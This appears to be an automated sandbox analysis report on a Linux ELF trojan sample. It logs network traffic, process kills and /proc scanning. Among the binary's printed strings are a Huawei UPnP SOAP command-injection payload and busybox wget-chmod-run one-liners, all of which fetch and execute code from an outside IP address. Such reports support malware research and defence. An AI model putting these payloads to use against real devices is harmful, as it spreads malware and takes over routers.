    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: Apache-Coyote/1.1Content-Type: text/html;charset=utf-8Content-Length: 1012Date: Sun, 14 Apr 2024 14:37:27 GMTData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 32 36 20 2d 20 45 72 72 6f 72 20 72 65 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3c 21 2d 2d 48 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 48 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 48 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 42 4f 44 59 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 42 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 50 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 41 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 41 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 48 52 20 7b 63 6f 6c 6f 72 20 3a 20 23 35 32 35 44 37 36 3b 7d 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 20 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 2d 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 68 31 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 70 3e 3c 62 3e 74 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 72 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 6d 65 73 73 61 67 65 3c 2f 62 3e 20 3c 75 3e 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 75 3e 3c 2f 70 3e 3c 70 3e 3c 62 3e 64 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 3c 75 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 28 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 29 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 75 3e 3c 2f 70 3e 3c 48 52 20 73 69 7a 65 3d
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbidden
    Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Sun, 14 Apr 2024 14:37:38 GMTConnection: closeContent-Length: 326Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 35 30 33 2e 20 54 68 65 20 73 65 72 76 69 63 65 20 69 73 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Service Unavailable</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Service Unavailable</h2><hr><p>HTTP Error 503. The service is unavailable.</p></BODY></HTML>
    Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Sun, 14 Apr 2024 14:37:38 GMTConnection: closeContent-Length: 326Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 35 30 33 2e 20 54 68 65 20 73 65 72 76 69 63 65 20 69 73 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Service Unavailable</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Service Unavailable</h2><hr><p>HTTP Error 503. The service is unavailable.</p></BODY></HTML>
    Source: HfuP5Csj29.elfString found in binary or memory: http://194.62.248.103/8UsA.sh;
    Source: HfuP5Csj29.elfString found in binary or memory: http://194.62.248.103/bins/x86
    Source: HfuP5Csj29.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
    Source: HfuP5Csj29.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 33606
    Source: unknownNetwork traffic detected: HTTP traffic on port 33606 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443
    Source: unknownHTTPS traffic detected: 54.171.230.55:443 -> 192.168.2.23:33606 version: TLS 1.2

    System Summary

    barindex
    Sample tries to kill multiple processes (SIGKILL)
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)SIGKILL sent: pid: 720, result: successfulJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)SIGKILL sent: pid: 759, result: successfulJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)SIGKILL sent: pid: 788, result: successfulJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)SIGKILL sent: pid: 800, result: successfulJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)SIGKILL sent: pid: 847, result: successfulJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)SIGKILL sent: pid: 884, result: successfulJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)SIGKILL sent: pid: 936, result: successfulJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)SIGKILL sent: pid: 1334, result: successfulJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)SIGKILL sent: pid: 1335, result: successfulJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)SIGKILL sent: pid: 1872, result: successfulJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)SIGKILL sent: pid: 2096, result: successfulJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)SIGKILL sent: pid: 2097, result: successfulJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)SIGKILL sent: pid: 2102, result: successfulJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)SIGKILL sent: pid: 2180, result: successfulJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)SIGKILL sent: pid: 2208, result: successfulJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)SIGKILL sent: pid: 2275, result: successfulJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)SIGKILL sent: pid: 2281, result: successfulJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)SIGKILL sent: pid: 2285, result: successfulJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)SIGKILL sent: pid: 2289, result: successfulJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)SIGKILL sent: pid: 2294, result: successfulJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)SIGKILL sent: pid: 6215, result: successfulJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6225)SIGKILL sent: pid: 720, result: successfulJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6225)SIGKILL sent: pid: 759, result: successfulJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6225)SIGKILL sent: pid: 788, result: successfulJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6225)SIGKILL sent: pid: 800, result: successfulJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6225)SIGKILL sent: pid: 847, result: successfulJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6225)SIGKILL sent: pid: 884, result: successfulJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6225)SIGKILL sent: pid: 936, result: successfulJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6225)SIGKILL sent: pid: 1334, result: successfulJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6225)SIGKILL sent: pid: 1335, result: successfulJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6225)SIGKILL sent: pid: 1860, result: successfulJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6225)SIGKILL sent: pid: 1872, result: successfulJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6225)SIGKILL sent: pid: 6212, result: successfulJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6225)SIGKILL sent: pid: 6220, result: successfulJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6225)SIGKILL sent: pid: 6223, result: successfulJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6225)SIGKILL sent: pid: 6229, result: successfulJump to behavior
    Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.62.248.103 -l /tmp/binary -r /mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary mips)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: Initial sampleString containing 'busybox' found: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
    Source: Initial sampleString containing 'busybox' found: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh|;
    Source: ELF static info symbol of initial sample.symtab present: no
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)SIGKILL sent: pid: 720, result: successfulJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)SIGKILL sent: pid: 759, result: successfulJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)SIGKILL sent: pid: 788, result: successfulJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)SIGKILL sent: pid: 800, result: successfulJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)SIGKILL sent: pid: 847, result: successfulJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)SIGKILL sent: pid: 884, result: successfulJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)SIGKILL sent: pid: 936, result: successfulJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)SIGKILL sent: pid: 1334, result: successfulJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)SIGKILL sent: pid: 1335, result: successfulJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)SIGKILL sent: pid: 1872, result: successfulJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)SIGKILL sent: pid: 2096, result: successfulJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)SIGKILL sent: pid: 2097, result: successfulJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)SIGKILL sent: pid: 2102, result: successfulJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)SIGKILL sent: pid: 2180, result: successfulJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)SIGKILL sent: pid: 2208, result: successfulJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)SIGKILL sent: pid: 2275, result: successfulJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)SIGKILL sent: pid: 2281, result: successfulJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)SIGKILL sent: pid: 2285, result: successfulJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)SIGKILL sent: pid: 2289, result: successfulJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)SIGKILL sent: pid: 2294, result: successfulJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)SIGKILL sent: pid: 6215, result: successfulJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6225)SIGKILL sent: pid: 720, result: successfulJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6225)SIGKILL sent: pid: 759, result: successfulJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6225)SIGKILL sent: pid: 788, result: successfulJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6225)SIGKILL sent: pid: 800, result: successfulJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6225)SIGKILL sent: pid: 847, result: successfulJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6225)SIGKILL sent: pid: 884, result: successfulJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6225)SIGKILL sent: pid: 936, result: successfulJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6225)SIGKILL sent: pid: 1334, result: successfulJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6225)SIGKILL sent: pid: 1335, result: successfulJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6225)SIGKILL sent: pid: 1860, result: successfulJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6225)SIGKILL sent: pid: 1872, result: successfulJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6225)SIGKILL sent: pid: 6212, result: successfulJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6225)SIGKILL sent: pid: 6220, result: successfulJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6225)SIGKILL sent: pid: 6223, result: successfulJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6225)SIGKILL sent: pid: 6229, result: successfulJump to behavior
    Source: classification engineClassification label: mal88.spre.troj.linELF@0/0@0/0
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)File opened: /proc/6196/exeJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)File opened: /proc/1582/exeJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)File opened: /proc/2033/exeJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)File opened: /proc/2275/exeJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)File opened: /proc/3088/exeJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)File opened: /proc/6195/exeJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)File opened: /proc/1612/exeJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)File opened: /proc/1579/exeJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)File opened: /proc/1699/exeJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)File opened: /proc/1335/exeJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)File opened: /proc/1698/exeJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)File opened: /proc/2028/exeJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)File opened: /proc/1334/exeJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)File opened: /proc/1576/exeJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)File opened: /proc/2302/exeJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)File opened: /proc/3236/exeJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)File opened: /proc/2025/exeJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)File opened: /proc/2146/exeJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)File opened: /proc/910/exeJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)File opened: /proc/4444/exeJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)File opened: /proc/4445/exeJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)File opened: /proc/912/exeJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)File opened: /proc/4446/exeJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)File opened: /proc/517/exeJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)File opened: /proc/759/exeJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)File opened: /proc/2307/exeJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)File opened: /proc/918/exeJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)File opened: /proc/1594/exeJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)File opened: /proc/2285/exeJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)File opened: /proc/2281/exeJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)File opened: /proc/1349/exeJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)File opened: /proc/1623/exeJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)File opened: /proc/761/exeJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)File opened: /proc/1622/exeJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)File opened: /proc/884/exeJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)File opened: /proc/1983/exeJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)File opened: /proc/2038/exeJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)File opened: /proc/1344/exeJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)File opened: /proc/1465/exeJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)File opened: /proc/1586/exeJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)File opened: /proc/1463/exeJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)File opened: /proc/2156/exeJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)File opened: /proc/800/exeJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)File opened: /proc/801/exeJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)File opened: /proc/1629/exeJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)File opened: /proc/1627/exeJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)File opened: /proc/1900/exeJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)File opened: /proc/4470/exeJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)File opened: /proc/4473/exeJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)File opened: /proc/3021/exeJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)File opened: /proc/491/exeJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)File opened: /proc/2294/exeJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)File opened: /proc/2050/exeJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)File opened: /proc/1877/exeJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)File opened: /proc/772/exeJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)File opened: /proc/1633/exeJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)File opened: /proc/1599/exeJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)File opened: /proc/1632/exeJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)File opened: /proc/774/exeJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)File opened: /proc/1477/exeJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)File opened: /proc/654/exeJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)File opened: /proc/896/exeJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)File opened: /proc/1476/exeJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)File opened: /proc/1872/exeJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)File opened: /proc/2048/exeJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)File opened: /proc/655/exeJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)File opened: /proc/1475/exeJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)File opened: /proc/2289/exeJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)File opened: /proc/656/exeJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)File opened: /proc/777/exeJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)File opened: /proc/657/exeJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)File opened: /proc/658/exeJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)File opened: /proc/4467/exeJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)File opened: /proc/419/exeJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)File opened: /proc/936/exeJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)File opened: /proc/1639/exeJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)File opened: /proc/1638/exeJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)File opened: /proc/2208/exeJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)File opened: /proc/2180/exeJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)File opened: /proc/1809/exeJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)File opened: /proc/1494/exeJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)File opened: /proc/1890/exeJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)File opened: /proc/2063/exeJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)File opened: /proc/2062/exeJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)File opened: /proc/1888/exeJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)File opened: /proc/1886/exeJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)File opened: /proc/420/exeJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)File opened: /proc/1489/exeJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)File opened: /proc/785/exeJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)File opened: /proc/1642/exeJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)File opened: /proc/788/exeJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)File opened: /proc/667/exeJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)File opened: /proc/789/exeJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)File opened: /proc/1648/exeJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)File opened: /proc/6157/exeJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)File opened: /proc/2078/exeJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)File opened: /proc/2077/exeJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)File opened: /proc/2074/exeJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)File opened: /proc/2195/exeJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)File opened: /proc/670/exeJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)File opened: /proc/2746/exeJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)File opened: /proc/793/exeJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)File opened: /proc/1656/exeJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)File opened: /proc/1654/exeJump to behavior
    Source: /tmp/HfuP5Csj29.elf (PID: 6212)File opened: /proc/674/exeJump to behavior
    Source: /usr/bin/dash (PID: 6259)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.0p6hgVyDzb /tmp/tmp.mbEvCYH2N6 /tmp/tmp.A9cxoroPmnJump to behavior
    Source: /usr/bin/dash (PID: 6268)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.0p6hgVyDzb /tmp/tmp.mbEvCYH2N6 /tmp/tmp.A9cxoroPmnJump to behavior

    Hooking and other Techniques for Hiding and Protection

    barindex
    Uses known network protocols on non-standard ports
    Source: unknownNetwork traffic detected: HTTP traffic on port 33276 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 33276
